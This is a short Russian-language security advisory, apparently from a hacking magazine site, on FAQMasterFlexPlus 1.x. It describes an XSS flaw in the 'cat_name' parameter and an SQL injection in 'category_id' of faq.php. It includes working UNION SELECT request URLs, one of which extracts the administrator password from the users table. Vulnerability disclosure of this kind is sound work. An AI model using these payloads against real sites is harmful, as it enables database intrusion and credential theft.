Хакер #305. Многошаговые SQL-инъекции
Программа: FAQMasterFlexPlus 1.x
Уязвимость позволяет удаленному пользователю осуществить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "cat_name" сценарием faq.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://www.example.com/[path/to/faq/]/faq.php? category_id=1&cat_name=[XSS]
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре "category_id" сценарием faq.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://www.example.com/[path/to/faq]/faq.php?category_id= 1'%20union%20select%201,1,user(),1/*
Для получения пароля администратора:
http://www.example.com/[path/to/faq]/faq.php?category_id= 1'%20union%20select%201,1,passwrd,1%20from%20users%20 where%20userid='admin